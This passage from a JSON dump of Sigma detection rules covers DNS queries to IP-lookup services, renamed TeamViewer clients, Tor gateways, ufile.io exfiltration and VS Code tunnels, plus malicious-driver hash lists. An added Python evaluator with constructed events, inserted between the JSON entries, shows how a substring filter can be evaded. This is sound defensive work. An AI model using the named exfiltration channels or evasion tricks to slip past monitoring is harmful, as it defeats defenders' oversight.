Image|startswith:\n            - 'C:\\Program Files\\Falkon\\'\n            - 'C:\\Program Files (x86)\\Falkon\\'\n        Image|endswith: '\\falkon.exe'\n    filter_optional_avant:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avant Browser\\'\n            - 'C:\\Program Files\\Avant Browser\\'\n        Image|endswith: '\\avant.exe'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely with other browser software. Apply additional filters for any other browsers you might use.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml",
    "content": "title: Suspicious DNS Query for IP Lookup Service APIs\nid: ec82e2a5-81ea-4211-a1f8-37a0286df2c2\nstatus: test\ndescription: Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.\nreferences:\n    - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon\n    - https://twitter.com/neonprimetime/status/1436376497980428318\n    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nauthor: Brandon George (blog post), Thomas Patzke\ndate: 2021-07-08\nmodified: 2024-03-22\ntags:\n    - attack.reconnaissance\n    - attack.t1590\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        - QueryName:\n              - 'www.ip.cn'\n              - 'l2.io'\n        - QueryName|contains:\n              - 'api.2ip.ua'\n              - 'api.bigdatacloud.net'\n              - 'api.ipify.org'\n              - 'bot.whatismyipaddress.com'\n              - 'canireachthe.net'\n              - 'checkip.amazonaws.com'\n              - 'checkip.dyndns.org'\n              - 'curlmyip.com'\n              - 'db-ip.com'\n              - 'edns.ip-api.com'\n              - 'eth0.me'\n              - 'freegeoip.app'\n              - 'geoipy.com'\n              - 'getip.pro'\n              - 'icanhazip.com'\n              - 'ident.me'\n              - 'ifconfig.io'\n              - 'ifconfig.me'\n              - 'ip-api.com'\n              - 'ip.360.cn'\n              - 'ip.anysrc.net'\n              - 'ip.taobao.com'\n              - 'ip.tyk.nu'\n              - 'ipaddressworld.com'\n              - 'ipapi.co'\n              - 'ipconfig.io'\n              - 'ipecho.net'\n              - 'ipinfo.io'\n              - 'ipip.net'\n              - 'ipof.in'\n              - 'ipv4.icanhazip.com'\n              - 'ipv4bot.whatismyipaddress.com'\n              - 'ipv6-test.com'\n              - 'ipwho.is'\n      
        - 'jsonip.com'\n              - 'myexternalip.com'\n              - 'seeip.org'\n              - 'wgetip.com'\n              - 'whatismyip.akamai.com'\n              - 'whois.pconline.com.cn'\n              - 'wtfismyip.com'\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of 
filter_optional_*\nfalsepositives:\n    - Legitimate usage of IP lookup services such as ipify API\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml",
    "content": "title: TeamViewer Domain Query By Non-TeamViewer Application\nid: 778ba9a8-45e4-4b80-8e3e-34a419f0b85e\nstatus: test\ndescription: Detects DNS queries to TeamViewer domains that are normally resolved only by the TeamViewer client, issued by an image whose path does not contain \"TeamViewer\" (threat actors sometimes rename the client to hide its use)\nreferences:\n    - https://www.teamviewer.com/en-us/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-30\nmodified: 2023-09-18\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName:\n            - 'taf.teamviewer.com'\n            - 'udp.ping.teamviewer.com'\n    filter_main_teamviewer:\n        # Note: A substring match is easy to evade with a similarly named path. Preferably replace this with the full install location of TeamViewer\n        Image|contains: 'TeamViewer'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - TeamViewer binaries installed under a path that does not contain \"TeamViewer\"\n    - Depending on the environment the rule might require initial tuning to avoid false positives with third-party applications\nlevel: medium\n"
  },
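The remote-access rule and the TeamViewer rule above share one condition shape, `1 of selection_* and not 1 of filter_*`, and rely on the Sigma string modifiers `endswith`, `startswith` and `contains` (all case-insensitive) plus exact matching. The block below is an added example and not code from the SigmaHQ repository: a minimal evaluator for exactly that subset, run over constructed Sysmon Event ID 22 (DnsQuery) records. The two rule dictionaries are trimmed transcriptions of the rules above (a few domains, the RustDesk pattern, two browser filters), and every image path and query in the event list is made up. It also shows the evasion the TeamViewer rule's own comment warns about: `Image|contains: 'TeamViewer'` suppresses any binary whose path happens to contain that string.

```python
# Added example (not from the SigmaHQ repository): a minimal evaluator for the
# string-matching subset of Sigma used by the dns_query rules above, run over
# constructed Sysmon Event ID 22 records.


def match_value(value: str, modifier: str, pattern: str) -> bool:
    """Sigma string matching is case-insensitive by default, so lower both sides."""
    v, p = value.lower(), pattern.lower()
    if modifier == "":
        return v == p
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "contains":
        return p in v
    raise ValueError(f"unsupported modifier: {modifier}")


def match_map(event: dict, selection: dict) -> bool:
    """Every key of a Sigma map must match (AND); a list of patterns is 'any of' (OR)."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None:
            return False
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not any(match_value(value, modifier, p) for p in patterns):
            return False
    return True


def match_block(event: dict, block) -> bool:
    """A block is one map, or a list of maps meaning OR (as in filter_optional_edge_1)."""
    if isinstance(block, list):
        return any(match_map(event, m) for m in block)
    return match_map(event, block)


def evaluate(rule: dict, event: dict) -> bool:
    """'1 of selection_* and not 1 of filter_*'; a lone 'selection' key counts as well."""
    det = rule["detection"]
    selections = [v for k, v in det.items() if k.startswith("selection")]
    filters = [v for k, v in det.items() if k.startswith("filter_")]
    return any(match_block(event, s) for s in selections) and not any(
        match_block(event, f) for f in filters
    )


def alerting_indices(rule: dict, events: list) -> list:
    """Indices of the events on which the rule fires."""
    return [i for i, e in enumerate(events) if evaluate(rule, e)]


# Trimmed transcription of the remote-access rule: RustDesk needs both
# modifiers on QueryName to hold; the Edge filter is a list of maps (OR).
REMOTE_ACCESS_RULE = {
    "detection": {
        "selection_generic": {
            "QueryName|endswith": ["client.teamviewer.com", "relay.screenconnect.com", "net.anydesk.com"]
        },
        "selection_rustdesk": {"QueryName|endswith": ".rustdesk.com", "QueryName|startswith": "rs-"},
        "filter_optional_chrome": {
            "Image": [
                "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
                "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe",
            ]
        },
        "filter_optional_edge_1": [
            {"Image|startswith": "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\"},
            {"Image|endswith": "\\WindowsApps\\MicrosoftEdge.exe"},
        ],
    }
}

# The TeamViewer rule, same shape as above: a substring filter is its only exclusion.
TEAMVIEWER_RULE = {
    "detection": {
        "selection": {"QueryName": ["taf.teamviewer.com", "udp.ping.teamviewer.com"]},
        "filter_main_teamviewer": {"Image|contains": "TeamViewer"},
    }
}

# Constructed Sysmon Event ID 22 records (only the two fields the rules read).
EVENTS = [
    {"Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe", "QueryName": "relay.screenconnect.com"},  # 0 RMM relay from a temp dir
    {"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "QueryName": "client.teamviewer.com"},  # 1 browser, filtered
    {"Image": "C:\\ProgramData\\upd\\update.exe", "QueryName": "rs-ny.rustdesk.com"},  # 2 RustDesk relay
    {"Image": "C:\\ProgramData\\upd\\update.exe", "QueryName": "rustdesk.com"},  # 3 apex only, no 'rs-' host
    {"Image": "C:\\Users\\bob\\AppData\\Local\\Microsoft\\WindowsApps\\MicrosoftEdge.exe", "QueryName": "NET.ANYDESK.COM"},  # 4 Edge, filtered case-insensitively
    {"Image": "C:\\Windows\\Temp\\tv.exe", "QueryName": "taf.teamviewer.com"},  # 5 renamed TeamViewer client
    {"Image": "C:\\Program Files\\TeamViewer\\TeamViewer.exe", "QueryName": "udp.ping.teamviewer.com"},  # 6 legitimate client
    {"Image": "C:\\Users\\bob\\Downloads\\TeamViewer_setup\\payload.exe", "QueryName": "udp.ping.teamviewer.com"},  # 7 evades Image|contains
]

if __name__ == "__main__":
    print("remote access rule fires on:", alerting_indices(REMOTE_ACCESS_RULE, EVENTS))  # [0, 2]
    print("teamviewer rule fires on:", alerting_indices(TEAMVIEWER_RULE, EVENTS))  # [5]
```

Event 7 is the case to remember when tuning `filter_main_teamviewer`: any process living under a folder that merely contains the word TeamViewer is excluded, which is why the rule suggests pinning the filter to the full install path instead.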
  {
    "path": "rules/windows/dns_query/dns_query_win_tor_onion_domain_query.yml",
    "content": "title: DNS Query Tor .Onion Address - Sysmon\nid: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544\nrelated:\n    - id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2\n      type: similar\n    - id: a8322756-015c-42e7-afb1-436e85ed3ff5\n      type: similar\nstatus: test\ndescription: Detects DNS queries to an \".onion\" address related to Tor routing networks\nreferences:\n    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml\nauthor: frack113\ndate: 2022-02-20\nmodified: 2025-09-12\ntags:\n    - attack.command-and-control\n    - attack.t1090.003\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|endswith:\n            - '.hiddenservice.net'\n            - '.onion.ca'\n            - '.onion.cab'\n            - '.onion.casa'\n            - '.onion.city'\n            - '.onion.direct'\n            - '.onion.dog'\n            - '.onion.glass'\n            - '.onion.gq'\n            - '.onion.ink'\n            - '.onion.it'\n            - '.onion.link'\n            - '.onion.lt'\n            - '.onion.lu'\n            - '.onion.nu'\n            - '.onion.pet'\n            - '.onion.plus'\n            - '.onion.rip'\n            - '.onion.sh'\n            - '.onion.to'\n            - '.onion.top'\n            - '.onion'\n            - '.s1.tor-gateways.de'\n            - '.s2.tor-gateways.de'\n            - '.s3.tor-gateways.de'\n            - '.s4.tor-gateways.de'\n            - '.s5.tor-gateways.de'\n            - '.t2w.pw'\n            - '.tor2web.ae.org'\n            - '.tor2web.blutmagie.de'\n            - '.tor2web.com'\n            - '.tor2web.fi'\n            - '.tor2web.io'\n            - '.tor2web.org'\n            - '.tor2web.xyz'\n            - '.torlink.co'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_ufile_io_query.yml",
    "content": "title: DNS Query To Ufile.io\nid: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b\nrelated:\n    - id: 090ffaad-c01a-4879-850c-6d57da98452d\n      type: similar\nstatus: test\ndescription: Detects DNS queries to \"ufile.io\", a file-sharing service that has been abused by malware and threat actors for data exfiltration\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\nauthor: yatinwad, TheDFIRReport\ndate: 2022-06-23\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains: 'ufile.io'\n    condition: selection\nfalsepositives:\n    - DNS queries for \"ufile.io\" are not necessarily malicious. Investigate the querying process to determine the appropriate action\nlevel: low\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml",
    "content": "title: DNS Query To Visual Studio Code Tunnels Domain\nid: b3e6418f-7c7a-4fad-993a-93b65027a9f1\nrelated:\n    - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels\n      type: similar\n    - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode\n      type: similar\n    - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels\n      type: similar\nstatus: test\ndescription: |\n    Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://cydefops.com/vscode-data-exfiltration\nauthor: citron_ninja\ndate: 2023-10-25\nmodified: 2023-11-20\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|endswith: '.tunnels.api.visualstudio.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Visual Studio Code tunnel will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_mal_drivers.yml",
    "content": "title: Malicious Driver Load\nid: 05296024-fe8a-4baf-8f3d-9a5f5624ceb2\nstatus: test\ndescription: Detects loading of known malicious drivers via their hash.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-18\nmodified: 2023-12-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        Hashes|contains:\n            - 'MD5=5be61a24f50eb4c94d98b8a82ef58dcf'\n            - 'MD5=d70a80fc73dd43469934a7b1cc623c76'\n            - 'MD5=3b71eab204a5f7ed77811e41fed73105'\n            - 'MD5=528ce5ce19eb34f401ef024de7ddf222'\n            - 'MD5=ae548418b491cd3f31618eb9e5730973'\n            - 'MD5=72f53f55898548767e0276c472be41e8'\n            - 'MD5=508faa4647f305a97ed7167abc4d1330'\n            - 'MD5=ed2b653d55c03f0bffa250372d682b75'\n            - 'MD5=0d2ba47286f1c68e87622b3a16bf9d92'\n            - 'MD5=3164bd6c12dd0fe1bdf3b833d56323b9'\n            - 'MD5=70fd7209ce5c013a1f9e699b5cc86cdc'\n            - 'MD5=c71be7b112059d2dc84c0f952e04e6cc'\n            - 'MD5=acac842a46f3501fe407b1db1b247a0b'\n            - 'MD5=01c2e4d8234258451083d6ce4e8910b7'\n            - 'MD5=c8541a9cef64589593e999968a0385b9'\n            - 'MD5=e172a38ade3aa0a2bc1bf9604a54a3b5'\n            - 'MD5=6fcf56f6ca3210ec397e55f727353c4a'\n            - 'MD5=2b80be31fbb11d4c1ef6d6a80b2e0c16'\n            - 'MD5=07056573d464b0f5284f7e3acedd4a3f'\n            - 'MD5=c7b7f1edb9bbef174e6506885561d85d'\n            - 'MD5=d5918d735a23f746f0e83f724c4f26e5'\n            - 'MD5=84763d8ca9fe5c3bff9667b2adf667de'\n            - 'MD5=fb593b1f1f80d20fc7f4b818065c64b6'\n            - 'MD5=909f3fc221acbe999483c87d9ead024a'\n            - 'MD5=e29f6311ae87542b3d693c1f38e4e3ad'\n            - 'MD5=aeb0801f22d71c7494e884d914446751'\n            - 'MD5=3f11a94f1ac5efdd19767c6976da9ba4'\n      
      - 'MD5=be6318413160e589080df02bb3ca6e6a'\n            - 'MD5=0b311af53d2f4f77d30f1aed709db257'\n            - 'MD5=d075d56dfce6b9b13484152b1ef40f93'\n            - 'MD5=27384ec4c634701012a2962c30badad2'\n            - 'MD5=5eb2c576597dd21a6b44557c237cf896'\n            - 'MD5=f56db4eba3829c0918413b5c0b42f00f'\n            - 'MD5=e27b2486aa5c256b662812b465b6036c'\n            - 'MD5=db86dfd7aefbb5be6728a63461b0f5f3'\n            - 'MD5=04a88f5974caa621cee18f34300fc08a'\n            - 'MD5=5129d8fd53d6a4aba81657ab2aa5d243'\n            - 'MD5=cd2c641788d5d125c316ed739c69bb59'\n            - 'MD5=7073cd0085fcba1cd7d3568f9e6d652c'\n            - 'MD5=24f0f2b4b3cdae11de1b81c537df41c7'\n            - 'MD5=88bea56ae9257b40063785cf47546024'\n            - 'MD5=63060b756377fce2ce4ab9d079ca732f'\n            - 'MD5=50b39072d0ee9af5ef4824eca34be6e3'\n            - 'MD5=57c18a8f5d1ba6d015e4d5bc698e3624'\n            - 'MD5=7d26985a5048bad57d9c223362f3d55c'\n            - 'MD5=ba54a0dbe2685e66e21d41b4529b3528'\n            - 'MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11'\n            - 'MD5=b52f51bbe6b49d0b475d943c29c4d4cb'\n            - 'MD5=a837302307dace2a00d07202b661bce2'\n            - 'MD5=78a122d926ccc371d60c861600c310f3'\n            - 'MD5=bdb305aa0806f8b38b7ce43c927fe919'\n            - 'MD5=27053e964667318e1b370150cbca9138'\n            - 'MD5=6a4fbcfb44717eae2145c761c1c99b6a'\n            - 'MD5=d13c1b76b4a1ca3ff5ab63678b51df6d'\n            - 'MD5=6a066d2be83cf83f343d0550b0b8f206'\n            - 'MD5=7108b0d4021af4c41de2c223319cd4c1'\n            - 'MD5=1cd158a64f3d886357535382a6fdad75'\n            - 'MD5=e939448b28a4edc81f1f974cebf6e7d2'\n            - 'MD5=4198d3db44d7c4b3ba9072d258a4fc2d'\n            - 'MD5=4a27a2bdc6fbe39eeec6455fb1e0ef20'\n            - 'MD5=30ca3cc19f001a8f12c619daa8c6b6e3'\n            - 'MD5=fe9004353b25640f6a879e57f07122d7'\n            - 'MD5=06c7fcf3523235cf52b3eee083ec07b2'\n            - 'MD5=364605ad21b9275681cffef607fac273'\n        
    - 'MD5=968ddb06af90ef83c5f20fbdd4eee62e'\n            - 'MD5=ba50bd645d7c81416bb26a9d39998296'\n            - 'MD5=29e03f4811b64969e48a99300978f58c'\n            - 'MD5=b0770094c3c64250167b55e4db850c04'\n            - 'MD5=40b968ecdbe9e967d92c5da51c390eee'\n            - 'MD5=b6b530dd25c5eb66499968ec82e8791e'\n            - 'MD5=f209cb0e468ca0b76d879859d5c8c54e'\n            - 'MD5=76f8607fc4fb9e828d613a7214436b66'\n            - 'MD5=4b058945c9f2b8d8ebc485add1101ba5'\n            - 'MD5=faae7f5f69fde12303dd1c0c816b72b7'\n            - 'MD5=89d294ef7fefcdf1a6ca0ab96a856f57'\n            - 'MD5=ef0e1725aaf0c6c972593f860531a2ea'\n            - 'MD5=bbdbffebfc753b11897de2da7c9912a5'\n            - 'MD5=5ebfc0af031130ba9de1d5d3275734b3'\n            - 'MD5=22949977ce5cd96ba674b403a9c81285'\n            - 'MD5=77cfd3943cc34d9f5279c330cd8940bc'\n            - 'MD5=311de109df18e485d4a626b5dbe19bc6'\n            - 'MD5=2730cc25ad385acc7213a1261b21c12d'\n            - 'MD5=87dc81ebe85f20c1a7970e495a778e60'\n            - 'MD5=154b45f072fe844676e6970612fd39c7'\n            - 'MD5=5a4fe297c7d42539303137b6d75b150d'\n            - 'MD5=d6a1dd7b2c06f058b408b3613c13d413'\n            - 'MD5=a6e9d6505f6d2326a8a9214667c61c67'\n            - 'MD5=7fad9f2ef803496f482ce4728578a57a'\n            - 'MD5=5076fba3d90e346fd17f78db0a4aa12c'\n            - 'MD5=79df0eabbf2895e4e2dae15a4772868c'\n            - 'MD5=14580bd59c55185115fd3abe73b016a2'\n            - 'MD5=1f2888e57fdd6aee466962c25ba7d62d'\n            - 'MD5=5e9231e85cecfc6141e3644fda12a734'\n            - 'MD5=dc564bac7258e16627b9de0ce39fae25'\n            - 'MD5=4e4c068c06331130334f23957fca9e3c'\n            - 'MD5=1ee9f6326649cd23381eb9d7dfdeddf7'\n            - 'MD5=4e1f656001af3677856f664e96282a6f'\n            - 'MD5=36f44643178c505ea0384e0fb241e904'\n            - 'MD5=6b480fac7caca2f85be9a0cfe79aedfc'\n            - 'MD5=c1ab425977d467b64f437a6c5ad82b44'\n            - 'MD5=fe508caa54ffeb2285d9f00df547fe4a'\n          
  - 'MD5=d3af70287de8757cebc6f8d45bb21a20'\n            - 'MD5=990b949894b7dc82a8cf1131b063cb1a'\n            - 'MD5=c62209b8a5daf3f32ad876ad6cefda1b'\n            - 'MD5=c159fb0f345a8771e56aab8e16927361'\n            - 'MD5=19b15eeccab0752c6793f782ca665a45'\n            - 'MD5=1d51029dfbd616bf121b40a0d1efeb10'\n            - 'MD5=157a22689629ec876337f5f9409918d5'\n            - 'MD5=3dd829fb27353622eff34be1eabb8f18'\n            - 'MD5=8636fe3724f2bcba9399daffd6ef3c7e'\n            - 'MD5=3d0b3e19262099ade884b75ba86ca7e8'\n            - 'MD5=97539c78d6e2b5356ce79e40bcd4d570'\n            - 'MD5=0308b6888e0f197db6704ca20203eee4'\n            - 'MD5=091a6bd4880048514c5dd3bede15eba5'\n            - 'MD5=7e92f98b809430622b04e88441b2eb04'\n            - 'MD5=bb5bda8889d8d27ef984dbd6ad82c946'\n            - 'MD5=b76aee508f68b5b6dccd6e1f66f4cf8b'\n            - 'MD5=a822b9e6eedf69211013e192967bf523'\n            - 'MD5=df52f8a85eb64bc69039243d9680d8e4'\n            - 'MD5=bfbdea0589fb77c7a7095cf5cd6e8b7a'\n            - 'MD5=44857ca402a15ab51dc5afe47abdfa44'\n            - 'MD5=f9844524fb0009e5b784c21c7bad4220'\n            - 'MD5=d34b218c386bfe8b1f9c941e374418d7'\n            - 'MD5=0ca010a32a9b0aeae1e46d666b83b659'\n            - 'MD5=93496a436c5546156a69deb255a9fed0'\n            - 'MD5=1cd5e231064e03c596e819b6ff48daf9'\n            - 'MD5=70a71fe86df717ac59dbf856d7ac5789'\n            - 'MD5=a33089d4e50f7d2ea8b52ca95d26ebf3'\n            - 'MD5=e0cc9b415d884f85c45be145872892b8'\n            - 'MD5=a42249a046182aaaf3a7a7db98bfa69d'\n            - 'MD5=c5ae6ca044bd03c3506c132b033be1dc'\n            - 'MD5=7ebe606acd81abf1f8cb0767c974164b'\n            - 'MD5=b5dcc869a91efcc6e8ea0c3c07605d63'\n            - 'MD5=62c18d61ed324088f963510bae43b831'\n            - 'MD5=093a2a635c3a27aac50efd6463f4efa1'\n            - 'MD5=28102acca39ad0199f262ba9958be3f4'\n            - 'MD5=650ef9dd70cb192027e536754d6e0f63'\n            - 'MD5=32eb3d2bf2c5b3da2d2a1f20fffbac44'\n            
- 'MD5=6771b13a53b9c7449d4891e427735ea2'\n            - 'MD5=072ba2309b825ce1dba37d8d924ea8ed'\n            - 'MD5=2d37d2fb9b9f8ac52bc02cba4487e3cb'\n            - 'MD5=1325ec39e98225e487b40043faee8052'\n            - 'MD5=4484f4007de2c3ee4581a2cff77ca3b4'\n            - 'MD5=a236e7d654cd932b7d11cb604629a2d0'\n            - 'MD5=17509f0a98dc5c5d52c3f9ac1428a21b'\n            - 'MD5=840a5edf2534dd23a082cf7b28cbfc4d'\n            - 'MD5=77a7ed4798d02ef6636cd0fd07fc382a'\n            - 'MD5=a9df5964635ef8bd567ae487c3d214c4'\n            - 'MD5=8b75047199825c8e62fdcc1c915db8bd'\n            - 'MD5=d416494232c4197cb36a914df2e17677'\n            - 'MD5=4cf14a96485a1270fed97bb8000e4f86'\n            - 'MD5=35e512f9bedc89dca5ce81f35820714c'\n            - 'MD5=40f35792e7565aa047796758a3ce1b77'\n            - 'MD5=f7f31bccc9b7b2964ac85106831022b1'\n            - 'MD5=26aedc10d4215ba997495d3a68355f4a'\n            - 'MD5=10f3679384a03cb487bda9621ceb5f90'\n            - 'MD5=80219fb6b5954c33e16bac5ecdac651b'\n            - 'MD5=cee36b5c6362993fa921435979bfbe4a'\n            - 'MD5=e37a08f516b8a7ca64163f5d9e68fe5a'\n            - 'MD5=49518f7375a5f995ebe9423d8f19cfe4'\n            - 'MD5=920df6e42cf91bbe19707f5a86e3c5c5'\n            - 'MD5=2ec877e425bd7eddb663627216e3491e'\n            - 'MD5=550b7991d93534bc510bc4f237155a7a'\n            - 'MD5=98d53f6b3bec0a3417a04fbb9e17fa06'\n            - 'MD5=13a57a4ef721440c7c9208b51f7c05de'\n            - 'MD5=c5fc3605194e033bdf3781ff2adaeb61'\n            - 'MD5=6e625ec04c20a9dbd48c7060efbf5e92'\n            - 'MD5=0b9b78d1281c7d4ab50497cf6ea7452a'\n            - 'MD5=4e906fcb13e2793c98f47291fd69391b'\n            - 'MD5=2bb353891d65c9e267eb98a3a2b694c3'\n            - 'MD5=7d86cdda7f49f91fdb69901a002b34e7'\n            - 'MD5=f69b06ca7c34d16f26ea1c6861edf62a'\n            - 'MD5=ee6b1a79cb6641aa44c762ee90786fe0'\n            - 'MD5=1fc7aeeff3ab19004d2e53eae8160ab1'\n            - 'MD5=24d3ea54f25e32832ac20335a1ce1062'\n            - 
'MD5=c94f405c5929cfcccc8ad00b42c95083'\n            - 'MD5=b164daf106566f444dfb280d743bc2f7'\n            - 'MD5=93130909e562925597110a617f05e2a9'\n            - 'MD5=f589d4bf547c140b6ec8a511ea47c658'\n            - 'MD5=bf445ac375977ecf551bc2a912c58e8a'\n            - 'MD5=629ee55e4b5a225d048fbcd5f0a1d18b'\n            - 'MD5=0023ca0ca16a62d93ef51f3df98b2f94'\n            - 'MD5=a3d69c7e24300389b56782aa63b0e357'\n            - 'MD5=cbd8d370462503508e44dba023bdf9bc'\n            - 'MD5=67daa04716803a15fc11c9e353d77c2f'\n            - 'MD5=c9d4214c850e0cedf033dc8f0cd3aace'\n            - 'MD5=bd5b0514f3b40f139d8079138d01b5f6'\n            - 'MD5=19bdd9b799e3c2c54c0d7fff68b31c20'\n            - 'MD5=f242cffd9926c0ccf94af3bf16b6e527'\n            - 'MD5=5aeab9427d85951def146b4c0a44fc63'\n            - 'MD5=40170485cca576adb5266cf5b0d3b0bd'\n            - 'MD5=c277c4386a78fae1b7e17eaecf4f472b'\n            - 'MD5=58c37866cbc3d1338e4fc58ada924ffe'\n            - 'MD5=0f16a43f7989034641fd2de3eb268bf1'\n            - 'MD5=0ae30291c6cbfa7be39320badd6e8de0'\n            - 'MD5=05dd59bd4f175304480affd8f1305c37'\n            - 'MD5=f838f4eb36f1e7036238776c7a70f0b0'\n            - 'MD5=85093bb9f027027c2c61aee50796de30'\n            - 'MD5=ae338d91d1b05a72559b7f6ed717362d'\n            - 'MD5=bd91787b5dcb2189b856804e85dfa1d9'\n            - 'MD5=6b3c1511e12f4d27a4ea3b18020d7b84'\n            - 'MD5=97264fd62d4907bdac917917a07b3b7a'\n            - 'MD5=6ececf26ff8b03ed7ffbddadec9a9dab'\n            - 'MD5=47e6ac52431ca47da17248d80bf71389'\n            - 'MD5=eb57f03b7603f0b235af62e8cd5be8c2'\n            - 'MD5=e1a9aa4c14669b1fb1f67a7266f87e82'\n            - 'MD5=29047f0b7790e524b09a06852d31a117'\n            - 'MD5=4dd6250eb2d368f500949952eb013964'\n            - 'MD5=fb7c61ef427f9b2fdff3574ee6b1819b'\n            - 'MD5=844af8c877f5da723c1b82cf6e213fc1'\n            - 'MD5=e39152eadd76751b1d7485231b280948'\n            - 'MD5=ac6e29f535b2c42999c50d2fc32f2c9c'\n            - 
'MD5=2406ea37152d2154be3fef6d69ada2c6'\n            - 'MD5=0ea8389589c603a8b05146bd06020597'\n            - 'MD5=754e21482baf18b8b0ed0f4be462ba03'\n            - 'MD5=c4a517a02ba9f6eac5cf06e3629cc076'\n            - 'MD5=32282e07db321e8d7849f2287bb6a14f'\n            - 'MD5=32b67a6cd6dd998b9f563ed13d54a8bc'\n            - 'MD5=3359e1d4244a7d724949c63e89689ef8'\n            - 'MD5=5917e415a5bf30b3fcbcbcb8a4f20ee0'\n            - 'MD5=0bdd51cc33e88b5265dfb7d88c5dc8d6'\n            - 'MD5=a90236e4962620949b720f647a91f101'\n            - 'MD5=ccde8c94439f9fc9c42761e4b9a23d97'\n            - 'MD5=68caf620ef8deaf06819cf8c80d3367b'\n            - 'MD5=5fec28e8f4f76e5ede24beb32a32b9d7'\n            - 'MD5=e8eac6642b882a6196555539149c73f2'\n            - 'MD5=aa98b95f5cbae8260122de06a215ee10'\n            - 'MD5=a5bcaa2fc87b42e2e5d62a2e5dfcbc80'\n            - 'MD5=abc168fdca7169bf9dc40cec9761018d'\n            - 'MD5=7f9309f5e4defec132b622fadbcad511'\n            - 'MD5=4748696211bd56c2d93c21cab91e82a5'\n            - 'MD5=48394dce30bb8da5ae089cb8f41b86dc'\n            - 'MD5=65f800e1112864bf41eb815649f428d5'\n            - 'MD5=bd25be845c151370ff177509d95d5add'\n            - 